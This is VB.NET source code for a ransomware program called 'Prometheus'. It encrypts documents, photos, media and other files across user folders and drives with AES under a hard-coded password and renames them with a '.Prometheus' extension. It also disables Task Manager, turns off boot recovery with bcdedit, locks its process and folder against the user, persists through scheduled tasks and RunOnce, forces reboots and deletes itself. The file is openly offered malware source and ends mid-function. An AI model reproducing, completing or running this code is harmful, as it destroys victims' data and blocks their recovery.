Imports System.ComponentModel
Imports System.IO
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Security.AccessControl
Imports System.Security.Cryptography
Imports System.Security.Principal
Imports System.Text
Imports System.Threading
Imports Microsoft.Win32
Public Class Prometheus
Public Structure DEV_BROADCAST_HDR
Public dbch_size As Integer
Public dbch_devicetype As Integer
Public dbch_reserved As Integer
End Structure
Public Structure DEV_BROADCAST_VOLUME
Public dbch_size As Integer
Public dbch_devicetype As Integer
Public dbch_reserved As Integer
Public dbch_unitmask As Integer
Public dbch_flags As Short
End Structure
Private Const WM_DEVICECHANGE As Integer = &H219
Private Const DBT_DEVICEARRIVAL As Integer = &H8000
Private Const DBT_DEVTYP_VOLUME As Integer = &H2
Private ReadOnly Endorium As String = "C:\Users\"
Private ReadOnly TheAnaustrikCalendar As String = Environment.UserName
Private Const SWP_HIDEWINDOW = &H80
Private Declare Function FindWindow Lib "user32" Alias "FindWindow" _
(lpClassName As String, lpWindowName As String) As Long
Private Declare Function SetWindowPos Lib "user32" _
(hwnd As Long, hWndInsertAfter As _
Long,
x As Long,
y As Long,
cx As Long,
cy As Long,
wFlags As Long) As Long
<Obsolete>
Private Sub Prometheus_Load(sender As Object, e As EventArgs) Handles MyBase.Load
Dim processing As New HDDScarlett()
Dim neuron As New ScarlettNeuron()
Timer4.Start() 'System Restart
Timer3.Start() 'GPO Initializing Sceduled Administrative Task
Housing() 'Protect Process
File_Shield() 'Protect Process
Co_Existance() 'Application Spawn
SoilWork()
'Memory reduction for app to use less resource: Hence less odds of crashing
Dim gateway As New Drocentium_Crystal()
MatriArk() 'Admin rights to folder
AntiTaskManager() 'Bat file running within VB.Net
On Error GoTo Err
Admin_Protocol() 'Checks to see if admin is running, if so, "BCDEDIT" comes into play
'ReVive()'Copy's Program to system
Err:
End Sub
Public Sub KillCtrlAltDelete()
Dim regkey As RegistryKey
Dim keyValueInt As String = "1"
Dim subKey As String = "Software\Microsoft\Windows\CurrentVersion\Policies\System"
Try
regkey = Registry.CurrentUser.CreateSubKey(subKey)
regkey.SetValue("DisableTaskMgr", keyValueInt)
regkey.Close()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Sub Co_Existance()
On Error GoTo Err
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyMusic)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyDocuments)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.MyPictures)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.ProgramFiles)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Programs)
My.Computer.FileSystem.MoveFile(Assembly.GetExecutingAssembly().Location, My.Computer.FileSystem.SpecialDirectories.Temp)
Err:
End Sub
Public Shared Function IsAdministrator() As Boolean
Dim isAdmin As Boolean = False
Try
Dim user As IIdentity = WindowsIdentity.GetCurrent()
Dim principal As New WindowsPrincipal(CType(user, WindowsIdentity))
isAdmin = principal.IsInRole(WindowsBuiltInRole.Administrator)
Return isAdmin
Catch ex As Exception
Return isAdmin
End Try
End Function
Public Sub Admin_Protocol()
On Error GoTo Err
If IsAdministrator() Then 'Disable task manager via; registry by deleting value
KillCtrlAltDelete() 'kill task manager
'To disable automatic recovery, type: bcdedit / set current recoveryenabled No;
'('current' represents the current operating system and changing the value to "no" will stop automatic recovery).
Dim oProcess As New Process()
Dim oStartInfo As New ProcessStartInfo("cmd.exe", $"bcdedit /set {{current}} recoveryenabled no") With {
.WindowStyle = ProcessWindowStyle.Hidden
}
oStartInfo.CreateNoWindow = True
oStartInfo.UseShellExecute = False
oStartInfo.RedirectStandardOutput = True
oProcess.StartInfo = oStartInfo
oProcess.Start()
Dim sOutput As String
Using oStreamReader As StreamReader = oProcess.StandardOutput
sOutput = oStreamReader.ReadToEnd()
End Using
'Now we delete the volume entry with ID: {802d5e32-0784-11Da-bd33-000476eba25f}
'Removes the specified entry identifier (users) from the boot sequence
Dim aProcess As New Process()
Dim aStartInfo As New ProcessStartInfo("cdm.exe", $"bcdedit /delete {{802d5e32-0784-11Da-bd33-000476eba25f}}") With {
.CreateNoWindow = ProcessWindowStyle.Hidden
}
aStartInfo.CreateNoWindow = True
aStartInfo.UseShellExecute = False
aStartInfo.RedirectStandardOutput = True
aProcess.StartInfo = aStartInfo
aProcess.Start()
Dim tOutput As String
Using oStreamReader As StreamReader = aProcess.StandardOutput
tOutput = oStreamReader.ReadToEnd()
End Using
'Primary deletion of user accounts
'The net user command is used to add. remove, and make changes to the user accounts on a computer, all from the command prompt
Dim iProcess As New Process()
Dim iStartInfo As New ProcessStartInfo("cmd.exe", "/c net use * /delete /y") With {
.WindowStyle = ProcessWindowStyle.Hidden
}
iStartInfo.CreateNoWindow = True
iStartInfo.UseShellExecute = False
iStartInfo.RedirectStandardOutput = True
iProcess.StartInfo = iStartInfo
iProcess.Start()
Dim pOutput As String
Using oStreamReader As StreamReader = iProcess.StandardOutput
pOutput = oStreamReader.ReadToEnd()
End Using
End If
Err:
End Sub
'The DirectorySecurity class specifies the access rights for a system directory and how access attempts are audited.
'This class represents access and audit rights as a set of rules. Each access rule is represented by a FileSystemAccessRule object, while each audit rule is represented by a FileSystemAuditRule object.
'The DirectorySecurity Class Is an abstraction Of the underlying Windows file security system.
'In this system, Each directory has a discretionary access control list (DACL), which controls access To the directory, And a system access control list (SACL), which specifies the access control attempts that are audited. The FileSystemAccessRule And FileSystemAuditRule classes are abstractions Of the access control entries (ACEs) that comprise DACLs And SACLs.
'The DirectorySecurity Class hides many Of the details Of DACLs And SACLs;
'you Do Not have To worry about ACE ordering Or null DACLS.
'Use the FileSecurity Class To retrieve, add, Or change
'the access rules that represent the DACL And SACL Of a file.
Private Sub AddDirectorySecurity()
Dim FolderPath As String = My.Computer.FileSystem.SpecialDirectories.MyMusic
Dim domainAndUserName = Environment.UserDomainName & "\" & Environment.UserName
Dim FolderInfo As New DirectoryInfo(FolderPath)
Dim FolderAcl As DirectorySecurity = FolderInfo.GetAccessControl()
FolderAcl.RemoveAccessRule(New FileSystemAccessRule(domainAndUserName, FileSystemRights.FullControl, InheritanceFlags.ContainerInherit Or InheritanceFlags.ObjectInherit))
FolderInfo.SetAccessControl(FolderAcl)
End Sub
<Obsolete>
Public Sub Housing()
Dim t As New Thread(Sub()
'This compliments "Process Security" below so only Admin can terminate "Prometheus" process
Dim hProcess As IntPtr = GetCurrentProcess()
Dim dacl = GetProcessSecurityDescriptor(hProcess)
For i As Integer = dacl.DiscretionaryAcl.Count - &H1 To &H0 + &H1
dacl.DiscretionaryAcl.RemoveAce(i)
Next
dacl.DiscretionaryAcl.InsertAce(&H0, New CommonAce(AceFlags.None,
AceQualifier.AccessDenied,
ProcessAccessRights.PROCESS_ALL_ACCESS,
New SecurityIdentifier(WellKnownSidType.WorldSid, Nothing),
False,
Nothing))
SetProcessSecurityDescriptor(hProcess, dacl)
End Sub)
t.Start()
End Sub
'The Microsoft Windows security model enables you to control access to process objects.
'For more information about security, see Access-Control Model.
'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication
'process, And stores it in an access token. This access token describes the security context of all processes associated with the user.
'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
'You can use a token To specify the current security context For a process Using the CreateProcessWithTokenW Function.
'You can specify a security descriptor For a process When you Call the CreateProcess, CreateProcessAsUser,
'Or CreateProcessWithLogonW Function. If you specify NULL, the process gets a Default security descriptor.
'The ACLs In the Default security descriptor For a process come from the primary Or impersonation token Of the creator.
<Flags>
Public Enum ProcessAccessRights
PROCESS_CREATE_PROCESS = &H80
PROCESS_CREATE_THREAD = &H2
PROCESS_DUP_HANDLE = &H40
PROCESS_QUERY_INFORMATION = &H400
PROCESS_QUERY_LIMITED_INFORMATION = &H1000
PROCESS_SET_INFORMATION = &H200
PROCESS_SET_QUOTA = &H100
PROCESS_SUSPEND_RESUME = &H800
PROCESS_TERMINATE = &H1
PROCESS_VM_OPERATION = &H8
PROCESS_VM_READ = &H10
PROCESS_VM_WRITE = &H20
DELETE = &H10000
READ_CONTROL = &H20000
SYNCHRONIZE = &H100000
WRITE_DAC = &H40000
WRITE_OWNER = &H80000
STANDARD_RIGHTS_REQUIRED = &HF0000
PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED _
Or SYNCHRONIZE _
Or &HFFF
End Enum
'Process security API
'The GetKernelObjectSecurity function retrieves a copy of the security descriptor that protects a kernel object.
<DllImport("advapi32.dll", SetLastError:=True)>
Private Shared Function GetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
<Out> pSecurityDescriptor As Byte(), nLength As UInteger, <Out> ByRef lpnLengthNeeded As UInteger) As Boolean
End Function
'Process security API. Retrieves a pseudo handle for the current process.
'A pseudo handle is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.
'For compatibility with future operating systems, it is best to call GetCurrentProcess instead of hard-coding this constant value.
'The calling process can use a pseudo handle to specify its own process whenever a process handle is required.
'Pseudo handles are not inherited by child processes.
<DllImport("kernel32.dll")>
Public Shared Function GetCurrentProcess() As IntPtr
End Function
'Process security API. The SetKernelObjectSecurity function sets the security of a kernel object.
'For example, this can be a process, thread, or event.
'Note: This function should not be used when setting a security descriptor on file system objects.
'Instead, use the SetSecurityInfo or SetNamedSecurityInfo functions.
<DllImport("advapi32.dll", SetLastError:=True)>
Private Shared Function SetKernelObjectSecurity(Handle As IntPtr, securityInformation As Integer,
<[In]> pSecurityDescriptor As Byte()) As Boolean
End Function
'The NtSetInformationProcess function can be used to set a process as critical process.
'The system will bug check the system with the bug check code CRITICAL_PROCESS_TERMINATION (0xF4) when the critical process is terminated.
<DllImport("ntdll.dll", SetLastError:=True)>
Private Shared Function NtSetInformationProcess(hProcess As IntPtr, processInformationClass As Integer, ByRef processInformation As Integer, processInformationLength As Integer) As Integer
End Function
'Create a critical system process. This is a process that cannot be terminated...
'Need admin for this:
'Private Sub CriticalProcess()
'Dim isCritical As Integer = 1
' we want this to be a Critical Process
'Dim BreakOnTermination As Integer = 29
' value for BreakOnTermination (flag)
' Process.EnterDebugMode()
'acquire Debug Privileges
' setting the BreakOnTermination = 1 for the current process
' NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, isCritical, 4)
'End Sub
'These functions serve to protect "Prometheus's Process" from being terminated unless you are an admin. If you activate the code above then run the program you'll see.
'The Microsoft Windows security model enables you to control access to process objects. For more information about security,
'see Access-Control Model.
'When a user logs in, the system collects a set of data that uniquely identifies the user during the authentication process,
'And stores it in an access token. This access token describes the security context of all processes associated with the user.
'The security context of a process Is the set of credentials given to the process Or the user account that created the process.
<Obsolete>
Public Shared Function GetProcessSecurityDescriptor(processHandle As IntPtr) As RawSecurityDescriptor
Const DACL_SECURITY_INFORMATION As Integer = &H4
Dim psd As Byte() = New Byte(-1) {}
Dim bufSizeNeeded As UInteger
GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, psd, 0, bufSizeNeeded)
If bufSizeNeeded < 0 OrElse bufSizeNeeded > Short.MaxValue Then Throw New Win32Exception()
If Not GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, CSharpImpl.Assign(psd, New Byte(bufSizeNeeded - 1) {}), bufSizeNeeded, bufSizeNeeded) Then Throw New Win32Exception()
Return New RawSecurityDescriptor(psd, 0)
End Function
'Set Process Security Descriptor Action. Adjusting Process Security allows a process To be Protected from most tampering by users.
'For example, adjusting process security can restrict who can Stop a process from the task manager.
Public Shared Sub SetProcessSecurityDescriptor(processHandle As IntPtr, dacl As RawSecurityDescriptor)
Const DACL_SECURITY_INFORMATION As Integer = &H4
Dim rawsd As Byte() = New Byte(dacl.BinaryLength - 1) {}
dacl.GetBinaryForm(rawsd, 0)
If Not SetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, rawsd) Then Throw New Win32Exception()
End Sub
'C# Conversion to VB.Net
Private Class CSharpImpl
'Specifies that one or more declared programming elements are associated with a class or structure at large,
'and not with a specific instance of the class or structure.
<Obsolete("Please refactor calling code to use normal Visual Basic assignment")>
Shared Function Assign(Of T)(ByRef target As T, value As T) As T
target = value
Return value
End Function
End Class
Private Sub File_Shield()
'This prevents Prometheus "exe" folder from being accessed, unless the admin
Dim filePath As String
filePath = (Environment.GetFolderPath(Assembly.GetExecutingAssembly().Location))
Dim adminUserName As String = Environment.UserName
Dim ds As DirectorySecurity = Directory.GetAccessControl(filePath)
On Error GoTo Err
Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
ds.AddAccessRule(fsa)
Directory.SetAccessControl(filePath, ds)
Err:
End Sub
'AES 256-bit encryption
Public Function Riezengard_The_Malevolent_One(seedKill As Byte(), oraclepass As Byte()) As Byte()
Dim FesteringBytes As Byte() = Nothing
'A Byte is made up of more than just 8 values (between 0-1 but 256 "28") different Bytes which stands for 3 values between 0 & 9, but 1000 (103) permutations from 0(00) to 999 and is easily mistaken.
Dim theBayOfDead As Byte() = New Byte() {1, 1, 2, 2, 3, 3, 4, 4}
'Reads a sequence of bytes from the current memory stream and advances the position within the memory stream by the number of bytes read.
Using rythorian As New MemoryStream()
Using AES As New RijndaelManaged()
AES.KeySize = 256
AES.BlockSize = 128
Dim key = New Rfc2898DeriveBytes(oraclepass, theBayOfDead, 100)
AES.Key = key.GetBytes(AES.KeySize / 8)
AES.IV = key.GetBytes(AES.BlockSize / 8)
AES.Mode = CipherMode.CBC
Using cs = New CryptoStream(rythorian, AES.CreateEncryptor(), CryptoStreamMode.Write)
cs.Write(seedKill, 0, seedKill.Length)
cs.Close()
End Using
FesteringBytes = rythorian.ToArray()
End Using
End Using
Return FesteringBytes
End Function
Public Sub Thantalos_The_Filth(seething As String, malice As String)
Dim maliceBitter As Byte() = Encoding.UTF8.GetBytes(malice)
maliceBitter = SHA256.Create().ComputeHash(maliceBitter)
Dim DarkendCrypt As Byte() = File.ReadAllBytes(seething)
Try
Dim VanquishLight As Byte() = Riezengard_The_Malevolent_One(DarkendCrypt, maliceBitter)
File.WriteAllBytes(seething, VanquishLight)
Dim extension As String = ".Prometheus"
File.Move(seething, seething _
& extension)
Catch __unusedUnauthorizedAccessException1__ As UnauthorizedAccessException
End Try
End Sub
Public Sub Annika_Kreznok_Infernal_Directory_The_Quiet_One(WormHole As String, malice As String)
Try
Dim quantumentanglement = {".3dm", ".3g2", ".3gp", ".aaf", ".accdb", ".aep", ".aepx", ".adt", ".adts", ".mdb", ".tiff",
".aet", ".ai", ".aif", ".arw", ".as", ".as3", ".asf", ".asp", ".asx", ".avi", ".bay", ".bmp",
".cdr", ".accde", ".midi", ".tmp", ".wp5", ".cer", ".class", ".cpp", ".cr2", ".crt", ".crw",
".cs", ".csv", ".db", ".dbf", ".dcr", ".der", ".dng", ".accdr", ".msi", ".txt", ".xps", ".doc",
".docb", ".docm", ".docx", ".dot", ".dotm", ".dwg", ".dxf", ".dxg", ".efx", ".eps", ".aac",
".aiff", ".mui", ".wms", ".erf", ".fla", ".flv", ".idml", ".iff", ".indb", ".indd", ".indl",
".indt", ".inx", ".jar", ".java", ".aifc", ".bin", ".pub", ".wmz", ".jpeg", ".jpg", ".kdc",
".m3u", ".m3u8", ".m4u", ".max", ".mdb", ".mdf", ".mef", ".mid", ".mov", ".mp3", ".cda", ".gif",
".vsd", ".mp4", ".mpa", ".mpeg", ".mrw", ".msg", ".nef", ".nrw", ".odb", ".odc", ".odm", ".odp",
".ods", ".aspx", ".htm", ".html", ".vss", ".odt", ".orf", ".p12", ".p7b", ".p7c", ".pdb", ".pdf",
".pef", ".pem", ".pfx", ".php", ".plb", ".pmd", ".bat", ".vssm", ".pot", ".potm", ".potx", ".ppam",
".ppj", ".pps", ".ppsm", ".ppsx", ".ppt", ".pptm", ".pptx", ".prel", ".cab", ".css", ".vstm",
".prprof", ".ps", ".psd", ".pst", ".ptx", ".r3d", ".ra", ".raf", ".rar", ".raw", ".rb", ".rtf",
".rw2", ".dif", ".scss", ".vstx", ".rwl", ".sdf", ".sldm", ".sql", ".sr2", ".srf", ".srw", ".svg",
".swf", ".tif", ".vcf", ".vob", ".dll", ".sass", ".wbk", ".wav", ".wb2", ".wma", ".wmv", ".wpd",
".wps", ".x3f", ".xla", ".xlam", ".xlk", ".xll", ".xlm", ".xls", ".eml", ".ini", ".wks", ".xlsb",
".xlsm", ".xlsx", ".zlt", ".xltm", ".xlw", ".xml", ".xqx", ".zip", ".png", ".jfif", ".iso", ".m4a",
".wmd", ".3ds", ".3mf", ".7z", ".accft", ".adame", ".adicht", ".adx", ".adz", ".agr", ".ahk", ".cur",
".air", ".amg", ".ani", ".ape", ".ashx", ".bar", ".bps", ".bin", ".beam", ".bz2", ".blend", ".cdf",
".cpl", ".csproj", ".d3v", ".d4d", ".d4p", ".daf", ".dart", ".vb", ".cs", ".dbd", ".dgb", ".dbs",
".dbw", ".dc", ".dbx", ".dc6", ".dcc", ".dcd", ".dcc", ".dch", ".dcs", ".dct", ".dda", ".deb", ".dds",
".dem", ".der", ".dfl", ".dfv", ".dic", ".dis", ".dlg", ".dls", ".dochtml", ".docmhtml", ".dothtml",
".dw2", ".dwf", ".ebd", ".email", ".emf", ".emz", ".epa", ".etl", ".evt", ".evtx", ".exp", ".fv4",
".fodg", ".fodp", ".fods", ".fodt", ".frm", ".frag", ".fs", ".gz", ".mdi", ".mid", ".msc", ".run",
".scv", ".torrent", ".tar", ".vbs", ".gif", ".js", ".taz", ".xar", ".php3", ".ico", ".ogg", ".tar"}
Dim files As String() = Directory.GetFiles(WormHole)
Dim offspring As String() = Directory.GetDirectories(WormHole)
For i As Integer = 0 To files.Length _
- 1
Dim extension As String = Path.GetExtension(files(i))
If quantumentanglement.Contains(extension) Then
Thantalos_The_Filth(files(i), malice)
End If
Next
For i As Integer = 0 To offspring.Length - 1
If offspring.Contains("Windows") OrElse offspring(i).Contains("Program Files") OrElse offspring(i).Contains("Program Files (x86)") Then Continue For
Annika_Kreznok_Infernal_Directory_The_Quiet_One(offspring(i), malice)
Next
Catch __unusedSystemException1__ As SystemException
End Try
End Sub
Private Sub Dead_Meadow()
On Error GoTo Err
Dim malice As String = "1234567890!@#$%^&*()_+_OrDeR_oF_CoRrUpTiOn"
Dim aeros As String = "\Desktop\"
Dim apathy As String = "\Downloads\"
Dim murder As String = "\Documents\"
Dim psychotron As String = "\Pictures\"
Dim mystra As String = "\Music\"
Dim cratus As String = "\Videos\"
Dim programFiles As String = "\ProgramFiles\"
Dim programs As String = "\Programs\"
Dim temps As String = "\Temp\"
'The strings below compliment the above calling for each drive
Dim needle As String = Endorium & TheAnaustrikCalendar & aeros
Dim basket As String = Endorium & TheAnaustrikCalendar & apathy
Dim mirrors As String = Endorium & TheAnaustrikCalendar & murder
Dim shattered As String = Endorium & TheAnaustrikCalendar & psychotron
Dim guide As String = Endorium & TheAnaustrikCalendar & mystra
Dim you As String = Endorium & TheAnaustrikCalendar & cratus
Dim blood As String = Endorium & TheAnaustrikCalendar & programFiles
Dim seething As String = Endorium & TheAnaustrikCalendar & programs
Dim wound As String = Endorium & TheAnaustrikCalendar & temps
'On Windows, GetLogicalDrives returns the names of all accessible drives on a particular machine,
'including any optical drives or removable media devices, in the form "<drive letter>:\" (for example, "C:\").
'On Unix, it returns the paths of all filesystem mount points mounted on a particular machine (for example,
'"/home/user", "/media/usb").
Dim wrath As String() = Directory.GetLogicalDrives()
For Each str As String In wrath
If str = "C:\" Then
Annika_Kreznok_Infernal_Directory_The_Quiet_One(needle, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(basket, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(mirrors, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(shattered, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(guide, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(you, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(blood, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(seething, malice)
Annika_Kreznok_Infernal_Directory_The_Quiet_One(wound, malice)
Else
Annika_Kreznok_Infernal_Directory_The_Quiet_One(str, malice)
End If
Next
Err:
End Sub
#Region " GPO Security Identifier | Creators Owner ID, (Highest Mandatory Level) | Schedule Task "
'GPO cmdlet creates a GPO with a specified name. By default, the newly created GPO is not linked to a site,
'domain, or organizational unit (OU).
'You can use this cmdlet To create a GPO that Is based On a starter GPO by specifying the GUID Or the display name
'Of the Starter GPO, Or by piping a StarterGpo Object into the cmdlet.
'The cmdlet returns a GPO Object, which represents the created GPO that you can pipe "To other Group Policy cmdlets."
Public Function GPO(cmd As String,
Optional args As String = "",
Optional startin As String = "") As String
GPO = ""
Try
Dim p = New Process With {
.StartInfo = New ProcessStartInfo(cmd, args)
}
If startin <> "" Then p.StartInfo.WorkingDirectory = startin
p.StartInfo.RedirectStandardOutput = True
p.StartInfo.RedirectStandardError = True
p.StartInfo.UseShellExecute = False
p.StartInfo.CreateNoWindow = True
p.Start()
p.WaitForExit()
Dim s = p.StandardOutput.ReadToEnd
s += p.StandardError.ReadToEnd
GPO = s
Catch ex As Exception
End Try
End Function ' Get Process Output.
'Possession Part of Owning System Via; The <Security Identifier>
Public Function CanH() As Boolean
CanH = False
'Displays user, group, and privileged information for the user who is currently logged on to the local system.
'If used without parameters, whoami displays the current domain and user name.
'[URL='https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami']whoami[/URL]
Dim s = GPO(
"c: \windows\system32\cmd.exe",
"/c whoami /all | findstr /I /C:""S-1-5-32-544""") '<<This is a Security Identifier
If s.Contains("S-1-5-32-544") Then CanH = True
End Function ' Check if can get Higher.
'Below: Creators Owner ID has discovered the "Security Identifier" to be replaced by the "S-1-16-12288"
'(Highestndatory Level) ADMIN.
'A Security Identifier (SID) is used to uniquely identify a security principal or security group. Security principals can represent any entity
'that can be authenticated by the operating system, such as a user account, a computer account, or a thread or process that runs in the security
'context of a user or computer account.Each account Or group, Or process running in the security context of the account,
'has a unique SID that Is issued by an authority, such as a Windows domain controller. It Is stored in a security database.
'The system generates the SID that identifies a particular account Or group at the time the account Or group Is created.
'When a SID has been used as the unique identifier for a user Or group, it can never be used again to identify another user Or group.
'Each time a user signs in, the system creates an access token for that user. The access token contains the user's SID, user rights, and the SIDs
'for any groups the user belongs to. This token provides the security context for whatever actions the user performs on that computer.
'In addition to the uniquely created, domain-specific SIDs that are assigned to specific users And groups, there are well-known SIDs that identify
'generic groups And generic users. For example, the Everyone And World SIDs identify a group that includes all users. Well-known SIDs have values
'that remain constant across all operating systems. SIDs are a fundamental building block Of the Windows security model.
'They work With specific components Of the authorization And access control technologies In the security infrastructure Of the
'Windows Server operating systems. This helps protect access To network resources And provides a more secure computing environment.
'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'How security identifiers work:
'Users refer To accounts by Using the account name, but the operating system internally refers To accounts And processes
'that run In the security context Of the account by Using their security identifiers (SIDs). For domain accounts, the SID Of a
'security principal Is created by concatenating the SID Of the domain With a relative identifier (RID) For the account.
'SIDs are unique within their scope (domain Or local), And they are never reused.
Public Function CH() As Boolean
CH = False
Dim s = GPO("c:\windows\system32\cmd.exe",
"/c whoami /all | findstr /I /C:""S-1-16-12288""")
If s.Contains("S-1-16-12288") Then CH = True
End Function ' Check if Higher.
'Elevating Privileges
Public Function GH() As Boolean
GH = False
If Not CH() Then
Try
'Elevating process privilege programmatically.
'In computing, runas is a command in the Microsoft Windows line of operating systems that allows a user to run specific
'tools and programs under a different username to the one that was used to logon to a computer interactively.
Dim pc As New ProcessStartInfo(Process.GetCurrentProcess.MainModule.FileName) With {
.Verb = "runas"
}
Dim p = Process.Start(pc)
Return True
Catch ex As Exception
Return False
End Try
End If
End Function ' Get Higher Level As Admin.
'Now that the information is gathered, we create a backdoor into the system via entry of Task Scheduler
'with the highest Logon.
Private Sub SubContractors()
' StartUp BackgroundWorker to schedule a startup task
Dim subw As New BackgroundWorker()
AddHandler subw.DoWork, Sub(sender1 As Object,
e1 As DoWorkEventArgs)
'Schedules Task to start up with Admin Rights
While True
Try
If CH() Then
If Not GPO("c:\windows\system32\cmd.exe",
$"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""").Contains("successfully") Then
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
Process.GetCurrentProcess.MainModule.FileName)
End If
Else
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce", True).SetValue("Prometheus",
Process.GetCurrentProcess.MainModule.FileName)
End If
Catch ex As Exception
End Try
Const MillisecondsTimeout As Integer = &H3A98 '15000
Thread.Sleep(MillisecondsTimeout)
End While
End Sub
subw.RunWorkerAsync()
End Sub
'This is a secondary worker backup for our "Background Worker" in the event the task fails.
Private Sub SoilWork()
On Error Resume Next
Dim p As New Process
With p.StartInfo
.FileName = "schtasks.exe"
.Arguments = $"/C schtasks /create /rl HIGHEST /sc ONLOGON /tn Prometheus /F /tr """"{Process.GetCurrentProcess.MainModule.FileName}""""".Contains("successfully")
.UseShellExecute = False
.RedirectStandardOutput = True
.CreateNoWindow = True
End With
My.Computer.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce",
True).SetValue("Prometheus", Process.GetCurrentProcess.MainModule.FileName)
p.Start()
Dim s As String = p.StandardOutput.ReadToEnd
MessageBox.Show(s,
"Create Task Results..")
End Sub
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
Timer1.Stop()
Dead_Meadow()
Timer2.Start() 'self destruct sequence of Prometheus = previous presence gone from system
CmdHideTaskBar()
End Sub
#End Region
'Hides Taskbar
Private Sub CmdHideTaskBar()
Dim thwnd As Long
thwnd = FindWindow("Shell_traywnd", "")
Call SetWindowPos(thwnd, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
End Sub
Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
Timer2.Stop()
Timer5.Start()
Ultimate_Self_Destruct() 'Call's for self-destruction of Prometheus
End Sub
'This program destroys itself after it's carnage
Public Sub Ultimate_Self_Destruct()
On Error GoTo Err
Dim Info As New ProcessStartInfo With {
.Arguments = $"/C timeout 2 && Del /Q /F {Application.ExecutablePath}",
.WindowStyle = ProcessWindowStyle.Hidden,
.CreateNoWindow = True,
.FileName = "cmd.exe"
}
Process.Start(Info)
Err:
End Sub
'Detect Flash Drive Insertion | Auto-Start Application "
'Function that gets the "Drive Letter" from the unit mask
'This detects flash plug-in>>>
Private Function GetDriveLetterFromMask(ByRef Unit As Integer) As Char
On Error Resume Next
For i As Integer = 0 To 25
If Unit = (2 ^ i) Then
Return Chr(Asc("A") + i)
End If
Next
End Function
Private Sub Timer3_Tick(sender As Object, e As EventArgs) Handles Timer3.Tick
Timer3.Stop()
End Sub
Private Sub Timer4_Tick(sender As Object, e As EventArgs) Handles Timer4.Tick
Timer4.Stop()
Process.Start("shutdown", "-r -f -t 5") '3.5 seconds
End Sub
' This is how you launch batch Script through VB.Net coding. Basically , this creates a bat file that loops
' killing task manager
Private Sub AntiTaskManager()
Try
Dim rythorian77 As New StringBuilder
rythorian77.AppendLine("@echo off")
rythorian77.AppendLine("Title: Batch AutoHideStart by: Rythorian77 (Justin Linwood Ross)")
rythorian77.AppendLine(":Commandline")
rythorian77.AppendLine("IF [""%~1""]==[""-e""] GoTo o")
rythorian77.AppendLine(":Clear vbs")
rythorian77.AppendLine("set Batch=%~%dpnx0")
rythorian77.AppendLine("(")
rythorian77.AppendLine("echo set objshell^= createobject^(""wscript.shell""^)")
rythorian77.AppendLine("echo obshell^.run ""%Batch% -e""^,vbhide ) > %temp%\bas.vbs")
rythorian77.AppendLine("start %temp%\bas.vbs")
rythorian77.AppendLine("exit")
rythorian77.AppendLine(":eek:")
rythorian77.AppendLine(":Loop")
rythorian77.AppendLine("Taskkill /IM taskmgr.exe /FI ""STATUS eq RUNNING"" /F")
rythorian77.AppendLine("goto loop")
rythorian77.AppendLine("IF NOT %ERRORLEVEL%==0")
rythorian77.AppendLine("CreateObject(""Wscript.Shell"").Run ""HyperNova.bat"", 0, True")
rythorian77.AppendLine("GoTo begin")
File.WriteAllText("AntiTaskManager.bat", rythorian77.ToString())
Process.Start("AntiTaskManager.bat")
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
'In most cases, the string returned by this method consists of all characters in the path up to, but not including,
'the last directory separator character(s). A directory separator character can be either DirectorySeparatorChar or
'AltDirectorySeparatorChar. If the path consists of a root directory, such as "c:\", null is returned.
'This method does Not support paths Using "file:".
'Because the returned path does Not include the last directory separator character(s),
'passing the returned path back into the GetDirectoryName method truncates one folder level per subsequent
'Call On the result path. For example, passing the path "C:\Directory\SubDirectory\test.txt" into GetDirectoryName
'returns "C:\Directory\SubDirectory". Passing that path, "C:\Directory\SubDirectory", into GetDirectoryName
'returns "C:\Directory".
Private Sub MatriArk()
On Error GoTo Err
Dim folderPath As String = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location)
Dim adminUserName As String = Environment.UserName
Dim ds As DirectorySecurity = Directory.GetAccessControl(folderPath)
Dim fsa As New FileSystemAccessRule(adminUserName, FileSystemRights.FullControl, AccessControlType.Deny)
ds.AddAccessRule(fsa)
Directory.SetAccessControl(folderPath, ds)
